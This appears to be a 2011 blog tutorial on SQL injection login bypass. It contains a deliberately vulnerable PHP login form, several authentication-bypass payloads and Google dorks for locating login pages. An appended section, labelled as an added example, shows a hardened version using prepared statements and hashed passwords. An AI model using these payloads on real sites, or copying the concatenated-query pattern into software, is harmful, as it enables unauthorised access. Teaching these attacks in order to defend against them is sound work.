Friday, September 9, 2011

SQL injection basics (bypassing the login form)

In this tutorial I will explain what SQL is (its structure), what SQL injection is, how the attack is performed, and how to make your website safe from such attacks. Before you read any other article on SQL injection, I recommend you read this one first. In this tutorial I will be using MySQL and PHP. I have chosen PHP since it is the most widely used language, and in most cases MySQL is the database used with PHP. PHP is a web scripting language like ASP, JSP, CGI... You need not learn this attack in every language; the concept of the attack remains the same for all of them.

Basics of SQL:
The structure of SQL is divided into:
SQL server -> Databases -> Tables -> Columns and Rows.
SQL server: an application which runs on the server side and serves requests according to the commands sent by the client side.
Database: a kind of container where the tables belonging to a particular application are kept.
Tables: store the data in the form of rows and columns.

SQL Injection: Introduction

It is the most widely used hacking technique, since most websites today maintain a database. SQL injection is a code (SQL) injection technique that works because of improper filtering of user input. Let's see a basic injection attack:

Bypassing the login form
Let's consider a login form, login.php:

<?php
if (isset($_POST['submit']))
{
    $username = $_POST['username'];
    $password = $_POST['pass'];
    // The submitted values are pasted straight into the SQL text: this is the vulnerable line.
    $check  = mysql_query("SELECT * FROM member WHERE username='$username' and password='$password'");
    $check2 = mysql_num_rows($check);

    if ($check2 == 0)
        echo "login failed";
    else
        header("location: members.php");
}
else
{
?>
<form action="login.php" method="post" name="login">
<h1>USERLOGIN</h1><br/>
Username:<input type="text" name="username">
<br/><br/>
Password:
<input type="password" name="pass">
<input type="submit" name="submit" value="Login"> </form>
<?php
}
?>


This is not an exact login form; I have written this code just to give you a feel for how a login form works. Focus on the PHP part: as you can see, the login details are sent via the "post" method as soon as the submit button is clicked, and the PHP code then runs because the "isset" condition is true. Now let's see what happens in the background: the SELECT query tries to fetch the details from the "member" table by comparing the username and password sent from the form with the username and password stored in the member table. Clearly the code I have written is vulnerable; let's see how.
Consider a situation where I have given input like the following:
Username: ' or 'a'='a'
Password: ' or 'a'='a'
Now let's see what happens in the background, i.e. in the SELECT statement:
select * from member where username=' ' or 'a'='a' and password=' ' or 'a'='a'
If you look carefully at the two 'a'='a' conditions, they both evaluate to "true", so the WHERE clause is satisfied. That means our username and password are accepted.
Some other username and password combinations which can come in handy for SQL injection:
Username: ' or 'a'=a');--
Password: anything

Username: ' or 'a'=a';--
Password: anything

In the SELECT statement this becomes:
select * from member where username=' ' or 'a'='a');-- and password=' ' or '1'='1'
Everything after "--" is treated as a comment, so the password check is never evaluated.

Bypassing the admin login form. In most cases the username of the administrator account is "admin", which can be useful when we are injecting code. Let's see:
Username: admin;--
Password: anything

Username: admin);--
Password: anything

Now consider a situation where you know the username and a few letters of the password; in such cases you can try the following:
Username: ' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='
Password: ' OR EXISTS(SELECT * FROM users WHERE username='admin' AND password LIKE '%a%') AND ''='

We can use Google dorks to find login pages. Example: type inurl:login or inurl:login.php or inurl:adminlogin or intitle:login into the Google search box.

Note: These combinations will not necessarily always work; it depends on how the script engine is programmed.
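The introduction promises to show how to make the website safe, but the post stops at the attacks. The following is an added example, not the original post's code, of the same login.php rewritten so that every payload above is harmless: the username and password are bound as parameters of a prepared statement instead of being concatenated into the SQL text, and passwords are stored as password_hash() digests rather than in plaintext. It assumes a PDO connection to a MySQL database named app (the credentials app_user / app_password are placeholders), a member table with the columns id, username and password_hash, and a members.php page to redirect to. The mysql_* functions used in the original were removed in PHP 7.0, so PDO (or mysqli) is what a current PHP offers anyway.

```php
<?php
// Added example (not the original post's code): the login flow from the post,
// hardened with PDO prepared statements and hashed passwords.
// Assumed: database "app" on localhost, user app_user / app_password (placeholders),
// table member(id, username, password_hash) where password_hash is a
// password_hash() result, and a members.php page.

function db(): PDO
{
    return new PDO(
        'mysql:host=localhost;dbname=app;charset=utf8mb4',
        'app_user',       // placeholder credentials
        'app_password',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
        ]
    );
}

// Returns the member's id on success, or null on failure.
// The username never becomes part of the SQL text: it is sent to the server as
// a bound value, so inputs such as ' or 'a'='a', admin;-- or the EXISTS(...)
// payloads are compared literally against the username column and match no row.
function authenticate(PDO $pdo, string $username, string $password): ?int
{
    $stmt = $pdo->prepare(
        'SELECT id, password_hash FROM member WHERE username = :username LIMIT 1'
    );
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Verify against the stored hash. password_verify() runs in constant time;
    // checking a dummy hash when the user does not exist keeps the response
    // time similar for known and unknown usernames.
    $hash = ($row !== false) ? $row['password_hash']
                             : password_hash('dummy', PASSWORD_DEFAULT);
    if (password_verify($password, $hash) && $row !== false) {
        return (int) $row['id'];
    }
    return null;
}

if (isset($_POST['submit'])) {
    $username = $_POST['username'] ?? '';
    $password = $_POST['pass'] ?? '';

    $id = authenticate(db(), $username, $password);
    if ($id === null) {
        // One generic message for a bad username and a bad password alike;
        // submitted values and database errors are never echoed back.
        echo 'login failed';
    } else {
        session_start();
        session_regenerate_id(true);      // fresh session id after login
        $_SESSION['member_id'] = $id;
        header('Location: members.php');
        exit;
    }
} else {
?>
<form action="login.php" method="post" name="login">
<h1>USERLOGIN</h1><br/>
Username: <input type="text" name="username"><br/><br/>
Password: <input type="password" name="pass">
<input type="submit" name="submit" value="Login">
</form>
<?php
}
```

With a bound parameter the database receives the SQL text and the value separately, so a username of ' or 'a'='a' is looked up as a string consisting of exactly those characters; no row matches and the login fails. The "--" comment trick and the admin;-- variants fail for the same reason: nothing the user types is ever parsed as SQL. What a prepared statement cannot fix is a weak password on the admin account, which is why the hash check and the generic error message are part of the example as well.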

